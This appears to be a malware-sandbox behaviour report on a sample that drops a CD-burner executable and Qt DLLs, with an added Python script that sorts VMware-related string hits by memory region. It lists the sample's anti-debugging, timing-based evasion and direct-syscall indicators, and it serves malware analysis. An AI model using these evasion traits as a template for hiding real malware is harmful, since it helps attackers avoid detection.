Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\oeqwwe
Source: C:\Users\user\Desktop\kXzODlqJak.exe | File created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | File created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\oeqwwe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\qpfwaekftwavc

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OEQWWE
Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QPFWAEKFTWAVC
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C67A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress | 3_2_6C67A3DD
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6C2E7C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6C2E7C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6C2E7945
Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 6C2E3B54
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qpfwaekftwavc
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oeqwwe
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Dropped PE file which has not been started: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | API coverage: 5.9 %
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe TID: 7780 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 3672 | Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 4100 | Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 2160 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0096A8A0h | 1_2_0096A805
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0096A899h | 1_2_0096A805
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001BA805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 001BA8A0h | 2_2_001BA805
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001BA805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 001BA899h | 2_2_001BA805
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00915C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose | 1_2_00915C81
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00961290 FindFirstFileExW | 1_2_00961290
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0097343B FindFirstFileW,FindClose | 1_2_0097343B
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092E72A FindFirstFileW,FindNextFileW,FindClose | 1_2_0092E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001B1290 FindFirstFileExW | 2_2_001B1290
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001C343B FindFirstFileW,FindClose | 2_2_001C343B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017E72A FindFirstFileW,FindNextFileW,FindClose | 2_2_0017E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_00165C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose | 2_2_00165C81
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D470D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose | 2_2_6D470D44
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D470534 _memset,FindFirstFileW,FindClose,2_2_6D470534
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D44B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D44B005
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4472FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D4472FA
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C67CC23
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C67C8FD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6481A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C6481A1
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097C535 VirtualQuery,GetSystemInfo,1_2_0097C535
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000003.1493027614.000000000A338000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000003.00000002.1515660840.000000006D06F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000008.00000002.1845347189.000000006C24F000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: l.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: cmd.exe, 00000005.00000002.1876913060.000000000275C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: RescueCDBurner.exe, 00000004.00000002.1574582615.000000006BFCF000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000003.00000002.1515660840.000000006D06F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1493027614.000000000A338000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1574582615.000000006BFCF000.00000008.00000001.01000000.00000014.sdmp, RescueCDBurner.exe, 00000008.00000002.1845347189.000000006C24F000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0095D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0095D3EE
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D48530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D48530E
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0091540B GetProcessHeap,RtlAllocateHeap,1_2_0091540B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00957142 SetUnhandledExceptionFilter,1_2_00957142
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0095D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0095D3EE
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00956B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00956B18
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00956FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00956FAF
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001A7142 SetUnhandledExceptionFilter,2_2_001A7142
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001AD3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001AD3EE
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001A6B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_001A6B18
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001A6FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001A6FAF
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4746CD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D4746CD
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4626E8 _wcscpy,_wcscpy,_wcscpy,_wcscpy,SetErrorMode,SetUnhandledExceptionFilter,2_2_6D4626E8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D47D4E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D47D4E7
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6AAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6C6AAD2C
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6307A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6C6307A7
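The "Binary or memory string" hits above are keyword matches (VMware, Emulation), and where a string was found matters more than the match itself. Each hit carries the name of the memory dump it came from, and on the values in this report the seventh dot-separated field of that name is 01000000 for dumps that also carry a non-zero module index and 00020000 for the rest, which line up with the Windows MEM_IMAGE and MEM_PRIVATE allocation-type constants; the example below treats that field as the region type. That reading is an inference from this page, not a documented format. The practical consequence: the NECVMWar SCSI CD-ROM device path and the "VMware, Inc." / noreply@vmware.com fragments (which look like X.509 subject fields) sit in private read-write memory of cmd.exe, where any process on this analysis VM would pick them up, while "VMware" next to \\.\PhysicalDrive0 inside RescueCDBurner.exe's own image is a string the binary ships with and is the one to chase in a disassembler. ".?AVQEmulationPaintEngine@@" is the RTTI name of Qt's QEmulationPaintEngine class, a benign match on the "Emulation" keyword. The script is an added example, not part of the report or the sample's tooling; it parses a constructed subset of the lines above and separates image-backed from private-memory hits.

```python
import re

# Constructed sample: "Binary or memory string" lines copied from the report above
# (the SCSI device path is shortened to its device-ID prefix).
SCSI_HIT = r"\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00"
QT_RTTI = ".?AVQEmulationPaintEngine@@"
STRING_HITS = [
    r"Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware",
    r"Source: cmd.exe, 00000005.00000002.1876913060.000000000275C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: " + SCSI_HIT,
    r"Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0",
    r"Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2",
    r"Source: RescueCDBurner.exe, 00000003.00000002.1515660840.000000006D06F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1493027614.000000000A338000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1574582615.000000006BFCF000.00000008.00000001.01000000.00000014.sdmp, RescueCDBurner.exe, 00000008.00000002.1845347189.000000006C24F000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: " + QT_RTTI,
]

# One "<process>, <dump name>" pair per region the string was seen in.
HIT_RE = re.compile(r"(?P<proc>[^\s,]+\.exe), (?P<dump>(?:[0-9A-F]+\.){8}sdmp)")

# Assumed field layout of the dump name, inferred from the values in this report:
#   pid . dump# . timestamp . address . protection . ? . region type . module index . sdmp
# The region-type values match the Windows MEM_* allocation-type constants.
MEM_TYPES = {0x1000000: "image", 0x20000: "private", 0x40000: "mapped"}


def parse_dump_name(dump):
    f = dump.split(".")
    return {
        "pid": int(f[0], 16),
        "address": int(f[3], 16),
        "protection": int(f[4], 16),    # PAGE_* value, e.g. 0x2 read-only, 0x4 read-write
        "mem_type": int(f[6], 16),
        "module_index": int(f[7], 16),  # non-zero only for image-backed dumps in this report
    }


def region_kind(dump):
    return MEM_TYPES.get(parse_dump_name(dump)["mem_type"], "unknown")


def hits(line):
    """All (process, region kind, string) triples recorded on one report line."""
    head, sep, s = line.partition("Binary or memory string: ")
    if not sep:
        return []
    return [(m["proc"], region_kind(m["dump"]), s) for m in HIT_RE.finditer(head)]


def triage(lines):
    """string -> set of (process, region kind) it was found in."""
    out = {}
    for line in lines:
        for proc, kind, s in hits(line):
            out.setdefault(s, set()).add((proc, kind))
    return out


def image_only(lines):
    """Strings that only ever appear in image-backed memory: they ship inside the binary."""
    return {s for s, where in triage(lines).items() if all(k == "image" for _, k in where)}


if __name__ == "__main__":
    shipped = image_only(STRING_HITS)
    for s, where in triage(STRING_HITS).items():
        tag = "in binary" if s in shipped else "runtime/environment"
        print(f"{tag:20} {sorted(where)}  {s[:60]}")
```

Strings reported as "in binary" are the only ones that can be attributed to the sample's own logic; a "runtime/environment" hit needs a second source (the code path that read it, or the same string appearing in an image region) before it counts as anti-VM behaviour.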

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B6C8C2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF799A6DD6DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF799B93594Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B37D02Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B3BF3BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B3FE5FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A7548AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC61D6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999EBB54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B41B29Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC8A54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9CE0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF799BDEB76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC7905Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateMutant: Direct from: 0x7FF799A99CC5Jump to behavior
